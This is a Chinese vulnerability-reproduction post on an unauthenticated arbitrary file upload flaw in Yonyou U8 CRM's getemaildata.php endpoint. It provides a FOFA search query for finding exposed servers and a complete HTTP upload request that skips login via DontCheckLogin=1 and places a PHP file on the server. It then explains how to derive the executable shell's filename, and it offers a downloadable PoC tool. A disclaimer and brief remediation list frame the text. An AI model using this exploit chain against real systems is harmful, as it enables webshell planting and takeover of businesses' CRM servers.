用友U8 crm客户关系管理存在任意文件上传漏洞2 附POC

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 用友U8 crm客户关系管理简介

微信公众号搜索：南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践，更符合中国企业营销管理特点，客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验，目标是帮助企业有效获取商机、提升营销能力。

2.漏洞描述

用友U8 crm客户关系管理 ajax/getemaildata.php任意文件上传漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

用友U8 CRM 

4.fofa查询语句

body="用友U8CRM"

5.漏洞复现

漏洞链接：http://127.0.0.1/ajax/getemaildata.php?DontCheckLogin=1

漏洞数据包：

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 205
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
Accept-Encoding: gzip, deflate

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="ceshi.php "
Content-Type: text/plain

<?php echo md5(1234);?>

------WebKitFormBoundarykS5RKgl8t3nwInMQ

上传之后返回的路径为：上传之后返回的路径为：D:U8SOFTturbocrm70codewwwtmpfilemht80A1.tmp.mht

文件名称为：mht80A1.tmp.mht，直接访问这个文件不解析，需要访问另一个文件

上传之后会在目录下生成两个文件tmp.mht和tmp.php文件

访问的解析文件格式为udp***.tmp.php

星号部分为返回的文件名的十六进制减去一

例如：80A1——>38304131(十六进制)，38304130（十六进制减一）——>80A0

最终的shell文件名为：http://127.0.0.1/tmpfile/upd80A0.tmp.php

6.POC&EXP

关注公众号  南风漏洞复现文库 并回复  漏洞复现52  即可获得该POC工具下载地址： 

7.整改意见

1.对上传文件格式进行严格校验及安全扫描，防止上传恶意脚本文件 2.设置权限限制，禁止上传目录的执行权限 3.严格限制可上传的文件类型 4.严格限制可上传的文件路径 5.文件扩展名服务端白名单校验 6.文件内容服务端校验 7.上传文件重命名 8.隐藏上传文件路径

8.往期回顾